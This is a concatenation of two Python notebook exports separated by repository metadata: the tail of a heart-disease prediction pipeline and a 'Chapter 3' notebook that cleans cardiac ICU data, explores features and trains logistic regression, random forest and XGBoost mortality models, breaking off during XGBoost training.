dash = 'dash'))
fig1 = go.Figure(data = [trace0, trace1])
fig1['layout'].update(title = 'Cumulative Feature Importance',\
xaxis = dict(title = 'Number of Features'),\
yaxis = dict(title = 'Cumulative Importance'),\
showlegend = False)
plotly.offline.iplot(fig1, filename='basic-line')
print(f'{importance_index + 1} features required for {100 * threshold}% of cumulative importance.')
return df
# ##### Routine to plot scores of model_results
def plot_scores(model):
# model.set_index('model', inplace=True)
trace0 = go.Bar(
y=model['cv_mean'],
x=model['model'],
marker=dict(
color='orange',
line=dict(
color='black',
width=1),
),
error_y=dict(
type='data',
array=model['cv_std'],
visible=True,
color ='black')
)
layout = go.Layout(title='F1 scores of models',
width=800, xaxis = dict(tickfont=dict(size=14), automargin=True))
fig = go.Figure(data=[trace0], layout=layout)
plotly.offline.iplot(fig, filename='F1-scores')
# ##### Routine to plot f1 and logloss score
def plot_f1_logloss(f1,logloss):
"plot f1 scores"
trace = []
for model in f1['model'].unique():
trace.append(go.Box(y = f1[f1['model']==model]['cv_scores'], name = model ,pointpos = 0,boxpoints = 'all'))
layout = go.Layout(autosize=True, showlegend=False, xaxis = dict(tickfont=dict(size=12)), title = f"Box plot of F1 socres")
fig = go.Figure(data=trace, layout=layout)
plotly.offline.iplot(fig, filename="Box Plot Styling Outliers")
"plot LogLoss"
trace1 = []
for model1 in logloss['model'].unique():
trace1.append(go.Box(y = logloss[logloss['model']==model1]['Neglogloss_scores'], name = model1 ,pointpos = 0,boxpoints = 'all'))
layout1 = go.Layout(autosize=True, showlegend=False, xaxis = dict(tickfont=dict(size=12)), title = f"Box plot of LogLoss")
fig1 = go.Figure(data=trace1, layout=layout1)
plotly.offline.iplot(fig1, filename="Box Plot Styling Outliers")
# ## Compare multiple models
# Run several models for classification (without fine tuning) to determine a good baseline model that works for this dataset
model_logloss = pd.DataFrame(columns = ['model','Neglogloss_scores'])
model_results = pd.DataFrame(columns = ['model','cv_scores'])
from sklearn.svm import LinearSVC, SVC
from sklearn.naive_bayes import GaussianNB
from sklearn.neural_network import MLPClassifier
from sklearn.linear_model import LogisticRegressionCV, RidgeClassifierCV, LogisticRegression
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn.neighbors import KNeighborsClassifier
from sklearn.calibration import CalibratedClassifierCV
# Run SVC
model_results = run_cv_model_f1(SVC(probability=True), train_set, train_labels, 'SVC', model_results)
model_logloss = run_cv_model_logloss(SVC(probability=True), train_set, train_labels, 'SVC', model_logloss)
# Run Random Forest Classifier
model_results = run_cv_model_f1(RandomForestClassifier(n_estimators = 100, random_state = 10, n_jobs = -1), train_set, train_labels, 'RF', model_results)
model_logloss = run_cv_model_logloss(RandomForestClassifier(n_estimators = 100, random_state = 10, n_jobs = -1), train_set, train_labels, 'RF', model_logloss)
# Run LDA
model_results = run_cv_model_f1(LinearDiscriminantAnalysis(), train_set, train_labels, 'LDA', model_results)
model_logloss = run_cv_model_logloss(LinearDiscriminantAnalysis(), train_set, train_labels, 'LDA', model_logloss)
# Run Logistic Regression
model_results = run_cv_model_f1(LogisticRegressionCV(), train_set, train_labels, 'LR', model_results)
model_logloss = run_cv_model_logloss(LogisticRegressionCV(), train_set, train_labels, 'LR', model_logloss)
# Run KNN
kn = [3, 5, 10, 20]
for n in kn:
model_results = run_cv_model_f1(KNeighborsClassifier(n_neighbors=n),
train_set, train_labels, f'KNN-{n}', model_results)
model_logloss = run_cv_model_logloss(KNeighborsClassifier(n_neighbors=n),
train_set, train_labels, f'KNN-{n}', model_logloss)
# +
from xgboost import XGBClassifier
from xgboost import plot_importance
import os
os.environ['KMP_DUPLICATE_LIB_OK']='True'
model_results = run_cv_model_f1(XGBClassifier(colsample_bytree=0.1,n_estimators=500, reg_lambda=1, learning_rate=0.08, min_child_weight = 2, max_depth = 8, gamma=2, subsample=.2,scale_pos_weight = 1, eval_metric='logloss',reg_alpha=0.00001), train_set, train_labels, 'XGB', model_results)
model_logloss = run_cv_model_logloss(XGBClassifier(colsample_bytree=0.1,n_estimators=500, reg_lambda=1, learning_rate=0.08, min_child_weight = 2, max_depth = 8, gamma=2, subsample=.2,scale_pos_weight = 1, eval_metric='logloss',reg_alpha=0.00001), train_set, train_labels, 'XGB', model_logloss)
# -
# LinearSVC
clf_SVC = CalibratedClassifierCV(LinearSVC(penalty="l1", dual=False))
model_results = run_cv_model_f1(clf_SVC, train_set, train_labels, 'LinearSVC', model_results)
model_logloss = run_cv_model_logloss(clf_SVC, train_set, train_labels, 'LinearSVC', model_logloss)
plot_f1_logloss(model_results,model_logloss)
model_final = model_results.merge(model_logloss, on = 'model')
model_final.groupby('model').mean().sort_values(by = 'Neglogloss_scores')
# ## Feature Engineering
# ##### RFECV feature selection
# +
#from sklearn.feature_selection import RFECV
#features_selection = np.array(train_set.columns)
#estimator = XGBClassifier(colsample_bytree=0.1,n_estimators=500, reg_lambda=1, learning_rate=0.08, min_child_weight = 2, max_depth = 8, gamma=2, subsample=.2,scale_pos_weight = 1, eval_metric='logloss',reg_alpha=0.00001)
#selector = RFECV(estimator, step = 1, cv = strkfold, scoring= scorer, n_jobs = -1)
# +
#selector = selector.fit(train_set, train_labels)
# +
#features_selected = [feat for (i,feat) in enumerate(features_selection) if selector.ranking_[i]==1]
# +
#train_set = train_set[features_selected]
#test_set = test_set[features_selected]
# -
# ##### Preprocessing with pipeline
# +
from sklearn.preprocessing import FunctionTransformer, PolynomialFeatures, Normalizer, StandardScaler
pipeline = Pipeline([('logtransform',FunctionTransformer(np.log1p, validate=True)),\
('polynomialFeatures', PolynomialFeatures(include_bias=True, degree = 2))])
# -
train_set_PF = pipeline.fit_transform(train_set)
test_set_PF = pipeline.fit_transform(test_set)
# ## Validation
# +
from sklearn.metrics import confusion_matrix
import itertools
def plot_confusion_matrix(cm, classes,
normalize=False,
title='Confusion matrix',
cmap=plt.cm.Oranges):
"""
This function prints and plots the confusion matrix.
Normalization can be applied by setting `normalize=True`.
Source: http://scikit-learn.org/stable/auto_examples/model_selection/plot_confusion_matrix.html
"""
if normalize:
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
print("Normalized confusion matrix")
else:
print('Confusion matrix, without normalization')
plt.figure(figsize = (10, 10))
plt.imshow(cm, interpolation='nearest', cmap=cmap)
plt.title(title, size = 24)
plt.colorbar(aspect=4)
tick_marks = np.arange(len(classes))
plt.xticks(tick_marks, classes, rotation=45, size = 14)
plt.yticks(tick_marks, classes, size = 14)
fmt = '.2f' if normalize else 'd'
thresh = cm.max() / 2.
# Labeling the plot
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
plt.text(j, i, format(cm[i, j], fmt), fontsize = 20,
horizontalalignment="center",
color="white" if cm[i, j] > thresh else "black")
plt.grid(None)
plt.tight_layout()
plt.ylabel('True label', size = 18)
plt.xlabel('Predicted label', size = 18)
# -
# split data into train and test sets
X_train, X_valid, y_train, y_valid = train_test_split(train_set_PF, train_labels, test_size=0.2, random_state=10)
# ##### Feature Selection with XGB
model_selection = XGBClassifier(colsample_bytree=0.1,n_estimators=500, reg_lambda=1, learning_rate=0.08, min_child_weight = 2, max_depth = 8, gamma=2, subsample=.2,scale_pos_weight = 1, eval_metric='logloss',reg_alpha=0.00001)
kfold = KFold(n_splits=10, random_state=7)
# select features using threshold
model_selection.fit(X_train,y_train)
selection = SelectFromModel(model_selection, threshold=0.01, prefit=True)
select_X_train = selection.transform(X_train)
# ##### Prediction with LogisticRegression
# train model
model_predict = LogisticRegression()
model_predict.fit(select_X_train, y_train)
# eval model
select_X_valid = selection.transform(X_valid)
y_pred = model_predict.predict(select_X_valid)
y_proba = model_predict.predict_proba(select_X_valid)
# +
#logloss
from sklearn.metrics import accuracy_score, log_loss
#accuracy = accuracy_score(y_valid, y_pred)
#print(accuracy)
#logi = log_loss(y_valid, y_proba)
#print(logi)
# +
valid_preds = model_predict.predict_proba(select_X_valid)
preds_df = pd.DataFrame(valid_preds, columns = targets)
preds_df['prediction'] = preds_df[targets].idxmax(axis = 1)
preds_df['confidence'] = preds_df[targets].max(axis = 1)
# -
print('Accuracy score:', round(accuracy_score(y_valid, preds_df['prediction']), 5))
print('logloss score:', round(log_loss(y_valid, preds_df[[0,1]]), 5))
# ###### plot confussion matrix
cm = confusion_matrix(y_valid, preds_df['prediction'])
plot_confusion_matrix(cm, classes = targets, title = 'heart_disease_present Matrix')
# +
cm_norm = cm.astype('float') / cm.sum(axis = 1)[:, np.newaxis]
for i in range(len(targets)):
for j in range(len(targets)):
if cm_norm[i,j] > 0.1 and i!=j:
print(f'Model predicts heart disease {j} instead of heart disease {i} on {cm[i,j]} ({cm_norm[i,j]:.2}%) examples')
# -
# ## Analysis of best model so far
# #### LR and feature selection
model_final = LogisticRegression()
# select features using threshold
model_selection.fit(train_set_PF, train_labels)
selection = SelectFromModel(model_selection, threshold=0.01, prefit=True)
select_train_set = selection.transform(train_set_PF)
model_final.fit(select_train_set, train_labels)
# +
predictions = pd.DataFrame()
select_test_set = selection.transform(test_set_PF)
# Make predictions from the fold as probabilities
probabilites = model_final.predict_proba(select_test_set)
# Record each prediction for each class as a separate column
for j in range(len(targets)):
predictions[j] = probabilites[:,j]
# Add needed information for predictions
predictions['patient_id'] = test_ids
# Find the class and associated probability
predictions['heart_disease_present'] = predictions[targets].idxmax(axis = 1)
predictions['confidence'] = predictions[targets].max(axis = 1)
# -
predictions.head()
# ##### Investigate distribution of labels in train and test
# +
trace0 = go.Bar(x = targets, y = df_final['heart_disease_present'].value_counts()/num_train, name = 'train',
marker=dict(
color='orange',
line=dict(
color='black',
width=1),
))
trace1 = go.Bar(x = targets, y = predictions['heart_disease_present'].value_counts()/num_test, name = 'predicted',
marker=dict(
color='blue',
line=dict(
color='black',
width=1),
))
layout = go.Layout(title='Label distribution in train and test (predicted)',
width=800, xaxis = dict(tickfont=dict(size=14), automargin=True),
yaxis = dict(title='Frequencies'))
fig = go.Figure(data=[trace0, trace1], layout=layout)
plotly.offline.iplot(fig, filename='label-dist')
# -
# ##### Submission
submission = submission_base.merge(predictions, on = 'patient_id', how = 'left')
submission = submission.drop(columns =[0,'heart_disease_present','confidence'])
submission = submission.rename(columns = {1:'heart_disease_present'})
submission.head()
submission.to_csv('Arnau_submission.csv',index=False)
| 26,713 |
/Chapter3.ipynb
|
ba1ca11447129c2666f4570022a48086890bb193
|
[] |
no_license
|
munglin/Explainability_and_Actionability
|
https://github.com/munglin/Explainability_and_Actionability
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 4,134,723 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Code for Chapter 3
# ### 1. Setting Up
# +
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import warnings
from pandas.core.common import SettingWithCopyWarning
warnings.simplefilter(action="ignore", category=SettingWithCopyWarning)
# -
df = pd.read_csv('cardiac_complete_v1.csv')
labels = df.columns.values
# ### Chapter 3.1 Feature Treatments
# Separate Variables
# #### Take in a set of labels, and return five lists: (1) Demographic Variables, (2) Lab Measurement Variables, (3) Interventions - Procedures, (4) Interventions - Drug, (5) Target.
# +
def get_features(labels,check=False):
labels_dem = []; labels_lab = []; labels_proc = [];
labels_drug = []; labels_tar = [];
if 'expire_flag' in labels:
labels_tar.append('expire_flag')
if 'age' in labels:
labels_dem.append('age')
if 'gender' in labels:
labels_dem.append('gender')
# Edit this section according to the dataset
labels_lab = labels[5:74]
labels_proc = labels[74:88]
labels_drug = labels[88:]
labels_dem = np.array(labels_dem,dtype=object)
labels_tar = np.array(labels_tar,dtype=object)
check_features(labels_dem,'Demographic',check)
check_features(labels_lab,'Laboratory Tests',check)
check_features(labels_proc,'Procedures',check)
check_features(labels_drug,'Drug Interventions',check)
check_features(labels_tar,'Target Value',check)
return labels_dem,labels_lab,labels_proc,labels_drug,labels_tar
def check_features(labels,type,check=False):
print('Total ' + type + ' Features: ' + str(len(labels)) )
if check:
print(*labels, sep = ", ")
# -
labels_dem,labels_lab,labels_proc,labels_drug,labels_tar = get_features(labels,False)
# Clean Data
def clean_dataframe(data):
data = data.copy()
labels_df = data.columns.values
# Cleaning
data = data.replace(['>20.2'], 20.3).replace(['GREATER THAN 10'], 10.1).replace(['>150'], 151).replace(['>1000'], 1001)
data = data.replace('0-2',1).replace(['<1','<1.0'],0).replace('3-May',4).replace('6-Oct',8).replace('Nov-20',15).replace('21-50',35).replace('>50',51)
data = data.replace(['.',' ', 'NotDone','NOTDONE'],np.nan)
data = data.replace('>80',81).replace('>300',301).replace('>500',501).replace('<35',34).replace('<1 /HPF',0).replace('>8',9)
data['gender'] = data['gender'].replace('M',0).replace('F',1)
data = data.replace(['NEGATIVE NO EOS SEEN', 'POSITIVE RARE EOS'],0)
data = data.replace('ERROR PREVIOUSLY REPORTED AS 9.4',9.4).replace('ERROR PREVIOUSLY REPORTED AS 32.6',32.6).replace('GREATER THAN 30',30).replace('ERROR PREVIOUSLY REPORTED AS 100',100).replace('150 IS HIGHEST MEASURED PTT',150).replace('ERROR PREVIOUSLY REPORTED AS 313',313).replace('ERROR PREVIOUSLY REPORTED AS 14.8',14.8).replace('ERROR PREVIOUSLY REPORTED AS 2.90',2.90).replace('ERROR PREVIOUSLY REPORTED AS 10.1',10.1)
data = data.replace('100-250',175).replace('1-2',1.5).replace('2-4',3).replace('25-100',62.5).replace('25-50',37.5).replace('100-200',150).replace('50-200',125).replace('100-500',300).replace('75-100',87.5).replace('12.5-25',18).replace('50-100',75).replace('100-400',250)
data = data.replace('1000-2000',1500).replace('2200-4300',3250).replace('1500-2900',2200).replace('1500-3000',2250).replace('400-900',650).replace('1400-2800',2100).replace('1700-3500',2600).replace('1900-3800',2850)
data['Specific Gravity'] = data['Specific Gravity'].replace('<1.005',0).replace('<=1.005',2).replace('>=1.030',3).replace('>1.030',4).replace('>=1.035',5).replace('>1.035',6).replace('>1.050',7).replace('>1.080',8)
data['Acetaminophen'] = data['Acetaminophen'].replace('325-650', 500).replace('500-1000',750)
data = data.replace('15-30',22.5).replace('30-60',45).replace('30-45',37.5)
data = data.replace('0.5-2',1.25).replace('0.5-1',0.75).replace('1-5',3).replace('2-8',5).replace('0.25-2',1.125).replace('0.25-0.5',0.375)
data = data.replace('2-4',3).replace('1-2',1.5).replace('2-6',4).replace('0.5-4',2.25).replace('2-5',3.5).replace('1-4',2.5)
data = data.replace('0.5-4.0',2.25).replace('1-8',4.5)
data = data.replace('200-400',300).replace('400-600',500).replace('15-30',22.5).replace('20-40',30).replace('40-60',50).replace('4-8',6)
data = data.replace('1-6',3.5).replace('2-10',6).replace('1-3',2).replace('1-10',5.5).replace('4-6',5)
data['Potassium Chloride'][data['Potassium Chloride'] == 9 ] = 10
data['Potassium Chloride'][data['Potassium Chloride'] == 2.5 ] = 0
data['Potassium Chloride'][data['Potassium Chloride'] == 12 ] = 10
# New additions
data['Bacteria'] = data['Bacteria'].replace(['NONE','O'],0).replace('RARE',1).replace('OCC',3).replace('FEW',2).replace('MOD',4).replace('MANY',5)
data['Bilirubin'] = data['Bilirubin'].replace('SM',0).replace('MOD',1).replace('LG',2)
data['Blood'] = data['Blood'].replace('SM',0).replace('MOD',1).replace(['LGE','LG'],2)
data['Creatine Kinase, MB Isoenzyme'] = data['Creatine Kinase, MB Isoenzyme'].replace('GREATER THAN 500',501)
data['Eosinophils'] = data['Eosinophils'].replace(['POSITIVE MODERATE EOS'],0)
data['Intubated'] = data['Intubated'].replace('INTUBATED',1).replace('NOT INTUBATED',0)
data['Leukocytes'] = data['Leukocytes'].replace('SM',0).replace('MOD',1).replace('LG',2)
data['Nitrite'] = data['Nitrite'].replace('POS',1)
data['SPECIMEN TYPE'] = data['SPECIMEN TYPE'].replace('ART',0).replace('VEN',1).replace('MIX',2).replace('CENTRAL VENOUS',3)
data['Troponin T'] = data['Troponin T'].replace(['LESS THAN 0.01','<0.01'],0.01).replace('<0.02',0.02).replace('<0.10',0.10)
data['Ventilator'] = data['Ventilator'].replace('CONTROLLED',1).replace('SPONTANEOUS',3).replace('IMV',2)
data['Yeast'] = data['Yeast'].replace('NONE',0).replace('FEW',2).replace('RARE',1).replace('OCC',3).replace('MOD',4).replace('MANY',5)
data = data.replace(['1-Feb', '2-Apr'],0.5)
data['Insulin'] = data['Insulin'].replace('Feb-16',0.125).replace(['16; give 1/2 dose when NPO'],16)
data['Meperidine'] = data['Meperidine'].replace('112.5-25',18).replace('25-30',27.5)
data['Metoprolol'] = data['Metoprolol'].replace(['Oct-20', '5-Oct'],0.5).replace('May-20',0.25)
data['Nitroglycerin'] = data['Nitroglycerin'].replace('0.25-0.6',0.5).replace('20-200',100).replace('0-10',5)
data['Ondansetron'] = data['Ondansetron'].replace('4-Aug',0.5).replace('2-Aug',0.25)
data['Urine Appearance'] = data['Urine Appearance'].replace(['Clear', 'CLEAR'],0).replace(['CLO','Cloudy','CLOUDY'],1).replace(['SlCloudy','SlCldy'],2).replace(['HAZY','Hazy'],3).replace(['SlHazy','SLHAZY'],4).replace('TURBID',5).replace('CLO',2)
data['Urine Color'] = data['Urine Color'].replace(['Yellow', 'YELLOW'],1).replace(['Amber','LtAmb','DkAmb','AMBER','AMB','DKAMBE','DKAMBER'],2).replace(['PINK', 'Red','RED',],3).replace(['Straw','STRAW','Other', 'None'],0).replace(['Orange','ORANGE'],4).replace(['Brown','B'],6).replace('Green',5)
data = data.replace(['ERROR', 'COMPUTER NETWORK FAILURE. TEST NOT RESULTED.','NEG','nan','CHRISTA1','TR'], np.nan)
check_unclean(data)
data_cleaned = data.astype(float)
return data_cleaned
# #### Function checks if the dataset is cleaned - contains only numerical values.
# Input: Dataframe; Output: Features which have non-numerical values
def check_unclean(data):
## PRINT THE VALUES WHICH ARE NOT YET FILLED
labels = data.columns.values
for j in labels:
non_numeric = []
for i in range(data.shape[0]):
x = data[j].iloc[i]
try:
float(x)
except:
if x not in non_numeric:
non_numeric.append(x)
if len(non_numeric)>0:
print(j, non_numeric)
data = clean_dataframe(df)
# ### Chapter 4 Features
# #### Choose which set of features to be used
# Selecting only Demographic + Lab Test Features
features_lab_raw = np.concatenate((labels_dem,labels_lab))
# Selecting Demographic + Lab Test + Interventional Features
# features_int_raw = np.concatenate((labels_dem,labels_lab,labels_proc,labels_drug))
labels_tar
# Select the features which are being used
X_raw = data[features_lab_raw]
Y = data[labels_tar]
missing_percentage = (X_raw.isna().sum(axis=0)/(X_raw.shape[0]/100)).values
features_lab = features_lab_raw.copy().tolist()
for i in range(len(missing_percentage)):
if missing_percentage[i] > 50:
print(features_lab_raw[i], missing_percentage[i])
features_lab.remove(features_lab_raw[i])
# #### Select features - (A) only demographic and lab test features or (B) demographic, lab test, procedures and drug features
## Select feature list
option_features = 'intervention'
features_chosen = features_lab
# Select either (A) only lab test + demographic variables, or (B) lab test + interventional features
if option_features == 'intervention':
features_chosen = np.concatenate((features_lab,labels_proc,labels_drug))
X = data[features_chosen]
if option_features == 'intervention':
# X[labels_proc] = X[labels_proc].applymap(lambda x: 0 if np.isnan(x) else x)
# X[labels_drug] = X[labels_drug].applymap(lambda x: 0 if np.isnan(x) else 1)
X[labels_proc] = X[labels_proc].applymap(lambda x: 0 if np.isnan(x) else x)
X[labels_drug] = X[labels_drug].applymap(lambda x: 0 if np.isnan(x) else 1)
# ### 5. Get information about the dataset
# #### A) Develop the mean and standard deviations
import statistics
from statistics import stdev
def checkbinary(row):
return np.array_equal(row.dropna(), row.dropna().astype(bool))
def get_distribution(X,Y):
df_dist = pd.DataFrame(np.zeros((16,X.shape[1])),columns=X.columns.values)
mean_all = X.apply(np.nanmean, axis=0)
std_all = X.apply(np.nanstd,axis=0)
df_dist.iloc[0,:] = np.nanpercentile(X,2.275,axis=0)
df_dist.iloc[1,:] = np.nanpercentile(X,15.865,axis=0)
df_dist.iloc[2,:] = np.nanpercentile(X,50.000,axis=0)
df_dist.iloc[3,:] = np.nanpercentile(X,84.135,axis=0)
df_dist.iloc[4,:] = np.nanpercentile(X,97.725,axis=0)
df_dist.iloc[5,:] = np.nanpercentile(X.loc[Y['expire_flag']==0],2.275,axis=0)
df_dist.iloc[6,:] = np.nanpercentile(X.loc[Y['expire_flag']==0],15.865,axis=0)
df_dist.iloc[7,:] = np.nanpercentile(X.loc[Y['expire_flag']==0],50.000,axis=0)
df_dist.iloc[8,:] = np.nanpercentile(X.loc[Y['expire_flag']==0],84.135,axis=0)
df_dist.iloc[9,:] = np.nanpercentile(X.loc[Y['expire_flag']==0],97.725,axis=0)
df_dist.iloc[10,:] = np.nanpercentile(X.loc[Y['expire_flag']==1],2.275,axis=0)
df_dist.iloc[11,:] = np.nanpercentile(X.loc[Y['expire_flag']==1],15.865,axis=0)
df_dist.iloc[12,:] = np.nanpercentile(X.loc[Y['expire_flag']==1],50.000,axis=0)
df_dist.iloc[13,:] = np.nanpercentile(X.loc[Y['expire_flag']==1],84.135,axis=0)
df_dist.iloc[14,:] = np.nanpercentile(X.loc[Y['expire_flag']==1],97.725,axis=0)
df_dist.iloc[15,:] = X.apply(checkbinary, axis=0)
return df_dist
data_percentiles = get_distribution(X,Y)
data_percentiles
# #### A) Visualise the features for each class
# +
import seaborn as sns
import matplotlib.pyplot as plt
def plot_distribution(feature,X,Y,bins=30):
X_0 = (X[Y['expire_flag']==0][feature])
X_1 = (X[Y['expire_flag']==1][feature])
plt.hist([X_0, X_1], bins, density=False)
plt.legend(['Class 0','Class 1'])
plt.xlabel('Distribution of ' + feature + ' for both classes')
plt.ylabel('Number of Patients')
plt.title('Histogram displaying the distriubtion of ' + feature + ' for both Classes')
plt.show()
# -
plot_distribution(features_chosen[80],X,Y,bins=15)
# #### B) Correlation between features and target class
# #### Firstly, measure the correlation between each feature and the target class
from scipy import stats
def return_correlation(feature,X,Y, corr='p'):
stats.pearsonr(X[feature],Y['expire_flag'])
if corr == 's':
print('S')
return tuple(stats.spearmanr(X['age'],Y['expire_flag'],nan_policy='omit'))
elif corr == 'k':
print('K')
return tuple(scipy.stats.kendalltau(X['age'],Y['expire_flag']))
else:
nan_flag = np.isnan(X[feature])
return stats.pearsonr(X[feature][~nan_flag],Y['expire_flag'][~nan_flag])
# #### Secondly, identify the mutual information between each feature and the output
# +
from sklearn.metrics import mutual_info_score
stats_MI = np.zeros(len(features_chosen),)
for i in range(len(features_chosen)):
stats_MI[i] = mutual_info_score(X[features_chosen[i]][~np.isnan(X[features_chosen[i]])].values.ravel(),Y[~np.isnan(X[features_chosen[i]])].values.ravel())
for i in np.argsort(np.abs(stats_MI))[::-1]:
print(features_chosen[i] + ', Correlation ' + "{:.4f}".format(stats_MI[i]))
# -
# #### Lastly, identify the correlation between a positive class and a particular feature
# +
stats_percentage = np.zeros((len(features_chosen),4))
for i in range(len(features_chosen)):
FT = features_chosen[i]
X_temp = X[FT][~np.isnan(X[FT])]
Y_temp = Y['expire_flag'][~np.isnan(X[FT])]
X_temp_median = np.median(X[FT][~np.isnan(X[FT])])
for j in range(len(X_temp)):
if Y_temp.iloc[j] == 0:
if (X_temp.iloc[j] <= X_temp_median):
# Class 0, Value of feature is small
stats_percentage[i,0] += 1
else:
# Class 0, value of feature is large
stats_percentage[i,1] += 1
else:
if (X_temp.iloc[j] <= X_temp_median):
# Class 1, value of feature is small
stats_percentage[i,2] += 1
else:
# Class 1, value of feature is large
stats_percentage[i,3] += 1
# -
for i in np.argsort(stats_percentage[:,3]*100/(stats_percentage[:,3] + stats_percentage[:,1]))[::-1]:
if features_chosen[i] in features_lab:
print("[DEM/LAB] " + features_chosen[i] + ": " + str(int(np.sum(stats_percentage[i,:]) )) + ". Positive Correlation Rate: {:.2f}".format(stats_percentage[i,3]*100/(stats_percentage[i,3] + stats_percentage[i,1])) + "%")
else:
print("[DRUG/INT] " + features_chosen[i] + ": " + str(int(np.sum(stats_percentage[i,:]) )) + ". Positive Correlation Rate: {:.2f}".format(stats_percentage[i,3]*100/(stats_percentage[i,3] + stats_percentage[i,1])) + "%")
# #### C) Correlation between each feature
# #### Finally, develop a correlation matrix, depicting the correlation between features.
# +
# Functions to calculate the correlations between features
def get_redundant_pairs(df):
'''Get diagonal and lower triangular pairs of correlation matrix'''
pairs_to_drop = set()
cols = df.columns
for i in range(0, df.shape[1]):
for j in range(0, i+1):
pairs_to_drop.add((cols[i], cols[j]))
return pairs_to_drop
def get_top_abs_correlations(df, n=5):
au_corr = df.corr().abs().unstack()
labels_to_drop = get_redundant_pairs(df)
au_corr = au_corr.drop(labels=labels_to_drop).sort_values(ascending=False)
return au_corr[0:n]
# -
# Calculate correlation matrix and identify highest performing features
corr_matrix = X.corr()
get_top_abs_correlations(corr_matrix,n=10)
# ### Chapter 3.3 Method - Machine Learning Models
# #### 1. Split into training and testing set
from sklearn.model_selection import cross_val_score, StratifiedKFold
from sklearn import preprocessing
from sklearn.metrics import accuracy_score, f1_score, roc_auc_score
from sklearn.model_selection import RandomizedSearchCV
from sklearn.model_selection import cross_val_score, KFold
crossval = KFold(n_splits=4,shuffle=True,random_state=420)
for train_index, test_index in crossval.split(X):
Xtrain, Xtest, Ytrain, Ytest = X.iloc[train_index,:], X.iloc[test_index,:], Y.iloc[train_index], Y.iloc[test_index]
# #### 2. Get Statistics
Xtrain_percentiles = get_distribution(Xtrain,Ytrain)
# +
# This function returns the highest and lowest feature values.
def get_percentile_categories(percentiles, sample):
category = np.zeros((len(sample),))
for i in range(len(sample)):
for j in range(5):
if sample[i] < percentiles.iloc[j,i]:
break
category[i] = j
return category
def print_important_percentiles(percentiles,X,idx):
sample = X.iloc[idx,:]
labels = X.columns.values
category = get_percentile_categories(percentiles,sample)
for j in range(len(sample)):
if np.isnan(sample[j]):
continue
if percentiles.iloc[15,j]==True:
continue
if category[j]==4:
print(labels[j]+", value "+str(sample[j])+" is VERY HIGH")
for j in range(len(sample)):
if np.isnan(sample[j]):
continue
if percentiles.iloc[15,j]==True:
continue
if category[j]==0:
print(labels[j]+", value "+str(sample[j])+" is VERY LOW")
# for j in range(len(sample)):
# if np.isnan(sample[j]):
# continue
# if percentiles.iloc[15,j]==True:
# continue
# if category[j]==1:
# print(labels[j]+", value "+str(sample[j])+" is LOW")
# for j in range(len(sample)):
# if np.isnan(sample[j]):
# continue
# if percentiles.iloc[15,j]==True:
# continue
# if category[j]==3:
# print(labels[j]+", value "+str(sample[j])+" is HIGH")
# -
# #### 3. Imputation
# +
from sklearn.experimental import enable_iterative_imputer # noqa
from sklearn.impute import IterativeImputer
Imputer = IterativeImputer(max_iter=20)
# Train a MICE imputer on the Training Set
# FIt the Imputer on the Test Set
Xtrain_bef_imp = Xtrain.copy()
Xtest_bef_imp = Xtest.copy()
Xtrain[features_chosen] = Imputer.fit_transform(Xtrain[features_chosen])
Xtest[features_chosen] = Imputer.transform(Xtest[features_chosen])
# -
print_important_percentiles(Xtrain_percentiles,Xtest_bef_imp,1)
# #### 4. Normalisation
# +
# Train a normaliser on the Training Set
# Fit the normaliser on the test set
scaler = preprocessing.MinMaxScaler()
scaler.fit(Xtrain)
Xtrain[Xtrain.columns.values] = scaler.transform(Xtrain[Xtrain.columns.values])
Xtest[Xtrain.columns.values] = scaler.transform(Xtest[Xtrain.columns.values])
# -
X.shape
# ### Chapter 3.4.2 Building Machine Learning Models on the Dataset
# #### 1. Train a LogReg model
# +
from sklearn.linear_model import LogisticRegression
from sklearn.calibration import CalibratedClassifierCV
LR = LogisticRegression(solver='liblinear',penalty="l2",multi_class='ovr',max_iter=5)
LR.fit(Xtrain,Ytrain)
print("Logistic Regression")
print("Training Accuracy: " + str(round(accuracy_score(Ytrain,LR.predict(Xtrain)), 6)))
print("Training ROC-AUC: " + str(round(roc_auc_score(Ytrain,LR.predict(Xtrain)), 6)))
print("Training F1: " + str(round(f1_score(Ytrain,LR.predict(Xtrain)), 6)))
print("Test Accuracy: " + str(round(accuracy_score(Ytest,LR.predict(Xtest)), 6)))
print("Test ROC-AUC: " + str(round(roc_auc_score(Ytest,LR.predict(Xtest)), 6)))
print("Test F1: " + str(round(f1_score(Ytest,LR.predict(Xtest)), 6)))
LR_calibrated = CalibratedClassifierCV(LR, method='sigmoid', cv=5)
LR_calibrated.fit(Xtrain,Ytrain)
# -
# #### 2. Train a Random Forest
# +
from sklearn.ensemble import RandomForestClassifier
rf_params = [200,3,7]
RF_best = RandomForestClassifier(n_estimators=rf_params[0],min_samples_leaf=rf_params[1],max_depth=rf_params[2],criterion='entropy')
RF_best.fit(Xtrain,Ytrain)
print("Random Forest")
print("Training Accuracy: " + str(round(accuracy_score(Ytrain,RF_best.predict(Xtrain)), 6)))
print("Training ROC-AUC: " + str(round(roc_auc_score(Ytrain,RF_best.predict(Xtrain)), 6)))
print("Training F1: " + str(round(f1_score(Ytrain,RF_best.predict(Xtrain)), 6)))
print("Test Accuracy: " + str(round(accuracy_score(Ytest,RF_best.predict(Xtest)), 6)))
print("Test ROC-AUC: " + str(round(roc_auc_score(Ytest,RF_best.predict(Xtest)), 6)))
print("Test F1: " + str(round(f1_score(Ytest,RF_best.predict(Xtest)), 6)))
RF_calibrated = CalibratedClassifierCV(RF_best, method='sigmoid', cv=5)
RF_calibrated.fit(Xtrain,Ytrain)
# -
# #### 3. Train an XGBoost Model
# +
# 3. XGBoost
xgb_params = [0.02,200,5,7]
from xgboost.sklearn import XGBClassifier
XGBoost = XGBClassifier(learning_rate=xgb_params[0],n_estimators=xgb_params[1],max_depth=xgb_params[2],min_child_weight=xgb_params[3])
XGBoost.fit(Xtrain,Ytrain)
print("XGBoost")
print("Training Accuracy: " + str(round(accuracy_score(Ytrain,XGBoost.predict(Xtrain)), 6)))
